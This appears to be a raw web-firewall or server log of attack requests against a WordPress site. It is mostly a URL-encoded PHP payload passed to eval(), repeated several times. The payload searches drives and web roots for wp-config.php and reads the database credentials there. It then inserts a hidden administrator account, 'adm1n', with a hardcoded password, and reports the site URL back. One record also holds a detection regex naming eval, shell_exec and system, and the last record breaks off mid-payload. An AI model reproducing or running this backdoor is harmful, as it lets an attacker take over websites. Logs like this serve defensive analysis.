mInwNQ:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-user:?1\ncontent-length:12663\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36\nhost:dewenlabels.com\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-mobile:?0\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Windows\"\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nupgrade-insecure-requests:1\nsec-fetch-site:none\naccept:*\/*\nsec-fetch-mode:navigate\n\nmInwNQ=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 06:08:51","213.209.159.254","POST","\/wp-includes\/feed.php","Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> ca:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%2